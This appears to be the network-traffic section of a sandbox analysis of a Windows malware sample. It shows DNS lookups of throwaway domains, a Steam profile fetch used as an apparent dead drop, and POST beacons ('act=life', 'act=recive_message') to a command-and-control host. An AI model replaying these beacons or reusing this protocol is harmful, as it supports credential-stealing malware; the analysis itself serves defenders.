Jan 11, 2025 08:05:53.509315968 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.511750937 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.511775970 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.511791945 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.511797905 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.528211117 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:53.528259039 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:53.528335094 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:53.528830051 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:53.528844118 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.001094103 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.001246929 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.004476070 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.004498005 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.004913092 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.006305933 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.006326914 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.006416082 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.409971952 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.410207987 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.410284042 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.410558939 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.410581112 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.410595894 CET	49731	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.410602093 CET	443	49731	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.446207047 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.446259022 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:54.446338892 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.446630001 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:54.446644068 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.089081049 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.089180946 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.090936899 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.090958118 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.091384888 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.092822075 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.092855930 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.092924118 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542184114 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542318106 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542391062 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.542398930 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542429924 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542478085 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.542530060 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542716980 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542757988 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.542773962 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542855978 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.542893887 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.542901993 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.543457985 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.543508053 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.543518066 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.596761942 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.596802950 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.630530119 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.630640030 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.630703926 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.630724907 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.630779028 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.630785942 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.631033897 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.631088018 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.667354107 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.667386055 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:55.667397976 CET	49732	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:55.667403936 CET	443	49732	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:56.116775036 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:56.116844893 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:56.116923094 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:56.117516041 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:56.117532015 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:56.589483976 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:56.589566946 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:56.590995073 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:56.591005087 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:56.591352940 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:56.592587948 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:56.592756987 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:56.592789888 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:56.592839003 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:56.592844963 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.196055889 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.196199894 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.196279049 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.196578026 CET	49733	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.196594000 CET	443	49733	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.319058895 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.319106102 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.319212914 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.319591999 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.319603920 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.796483040 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.796597958 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.797981977 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.797988892 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.798316956 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:57.799520016 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.799648046 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:57.799686909 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:58.315534115 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:58.315798998 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:58.315891981 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:58.373966932 CET	49734	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:58.373992920 CET	443	49734	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:58.904365063 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:58.904407978 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:58.904496908 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:58.904831886 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:58.904839993 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:59.377733946 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:59.377834082 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:59.383161068 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:59.383193970 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:59.383598089 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:59.385075092 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:59.385257006 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:59.385305882 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:05:59.385384083 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:05:59.385402918 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:06:00.035839081 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:06:00.035954952 CET	443	49735	104.21.48.1	192.168.2.4
Jan 11, 2025 08:06:00.036041021 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:06:00.037731886 CET	49735	443	192.168.2.4	104.21.48.1
Jan 11, 2025 08:06:00.037760973 CET	443	49735	104.21.48.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:05:51.771131992 CET	59603	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.780054092 CET	53	59603	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.783602953 CET	49715	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.792232990 CET	53	49715	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.796137094 CET	61422	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.806005955 CET	53	61422	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.809134960 CET	64312	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.817744970 CET	53	64312	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.819426060 CET	65127	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.827847958 CET	53	65127	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.829550028 CET	64183	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.838588953 CET	53	64183	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.860815048 CET	49771	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.944178104 CET	53	49771	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.948421955 CET	55486	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.957546949 CET	53	55486	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.960576057 CET	59369	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.971127987 CET	53	59369	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:51.974749088 CET	62729	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:51.989078999 CET	53	62729	1.1.1.1	192.168.2.4
Jan 11, 2025 08:05:53.515378952 CET	65268	53	192.168.2.4	1.1.1.1
Jan 11, 2025 08:05:53.527009010 CET	53	65268	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 08:05:51.771131992 CET	192.168.2.4	1.1.1.1	0xeb62	Standard query (0)	skidjazzyric.click	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.783602953 CET	192.168.2.4	1.1.1.1	0x950b	Standard query (0)	soundtappysk.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.796137094 CET	192.168.2.4	1.1.1.1	0xcebc	Standard query (0)	femalsabler.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.809134960 CET	192.168.2.4	1.1.1.1	0xacfe	Standard query (0)	apporholis.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.819426060 CET	192.168.2.4	1.1.1.1	0xde17	Standard query (0)	crowdwarek.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.829550028 CET	192.168.2.4	1.1.1.1	0xeb29	Standard query (0)	versersleep.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.860815048 CET	192.168.2.4	1.1.1.1	0x3c6a	Standard query (0)	chipdonkeruz.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.948421955 CET	192.168.2.4	1.1.1.1	0xab23	Standard query (0)	handscreamny.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.960576057 CET	192.168.2.4	1.1.1.1	0xa4db	Standard query (0)	robinsharez.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.974749088 CET	192.168.2.4	1.1.1.1	0xe34	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:53.515378952 CET	192.168.2.4	1.1.1.1	0x3b32	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 08:05:51.780054092 CET	1.1.1.1	192.168.2.4	0xeb62	Name error (3)	skidjazzyric.click	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.792232990 CET	1.1.1.1	192.168.2.4	0x950b	Name error (3)	soundtappysk.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.806005955 CET	1.1.1.1	192.168.2.4	0xcebc	Name error (3)	femalsabler.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.817744970 CET	1.1.1.1	192.168.2.4	0xacfe	Name error (3)	apporholis.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.827847958 CET	1.1.1.1	192.168.2.4	0xde17	Name error (3)	crowdwarek.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.838588953 CET	1.1.1.1	192.168.2.4	0xeb29	Name error (3)	versersleep.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.944178104 CET	1.1.1.1	192.168.2.4	0x3c6a	Name error (3)	chipdonkeruz.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.957546949 CET	1.1.1.1	192.168.2.4	0xab23	Name error (3)	handscreamny.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.971127987 CET	1.1.1.1	192.168.2.4	0xa4db	Name error (3)	robinsharez.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:51.989078999 CET	1.1.1.1	192.168.2.4	0xe34	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:53.527009010 CET	1.1.1.1	192.168.2.4	0x3b32	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:53.527009010 CET	1.1.1.1	192.168.2.4	0x3b32	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:53.527009010 CET	1.1.1.1	192.168.2.4	0x3b32	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:53.527009010 CET	1.1.1.1	192.168.2.4	0x3b32	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:53.527009010 CET	1.1.1.1	192.168.2.4	0x3b32	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:53.527009010 CET	1.1.1.1	192.168.2.4	0x3b32	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 08:05:53.527009010 CET	1.1.1.1	192.168.2.4	0x3b32	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sputnik-1985.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.102.49.254	443	6112	C:\Users\user\Desktop\Q7QR4k52HL.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:05:52 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-11 07:05:53 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 11 Jan 2025 07:05:53 GMT Content-Length: 35126 Connection: close Set-Cookie: sessionid=bfa7c8836669c3f21b560ccf; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-11 07:05:53 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-11 07:05:53 UTC	16384	IN	Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-11 07:05:53 UTC	3768	IN	Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-11 07:05:53 UTC	495	IN	Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 Data Ascii: criber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.48.1	443	6112	C:\Users\user\Desktop\Q7QR4k52HL.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:05:53 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sputnik-1985.com
2025-01-11 07:05:53 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-11 07:05:54 UTC	1121	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:05:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=626pgmv25kcocf46mu8b9u5a8q; expires=Wed, 07 May 2025 00:52:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FkseKCQvmGEGABygL6VJv6KdSRae1tPLy5AXvi1O7S1t79fl7JiQFCdStODQvll1Wjw1uvieSRm8FSrth6TR%2BMiHT%2B4KKWvxWPyYIQ%2FL0E14oiSIZ9mATiipCnACJIvG4snP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90030fa0eacf43be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1558&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1796923&cwnd=226&unsent_bytes=0&cid=34b85c7873b11959&ts=432&x=0"
2025-01-11 07:05:54 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-11 07:05:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.48.1	443	6112	C:\Users\user\Desktop\Q7QR4k52HL.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:05:55 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: sputnik-1985.com
2025-01-11 07:05:55 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2025-01-11 07:05:55 UTC	1123	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:05:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ga725qbqps0t918fn00c7erm65; expires=Wed, 07 May 2025 00:52:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9P3RHHZ1gWkca3PIlmy8m1DJyv1ZQudqqeIiatYs3qh88MO5tyDAkXsNRN0WymkNVrDl6fNMr1ldGXmUYsKyX3YEUvZ%2BC%2Beale1Icbg39X8U4r3jxmKL%2FvdloC8xg%2BWmfTyj"}],"group":"cf-nel","max_age":604800} NEL: 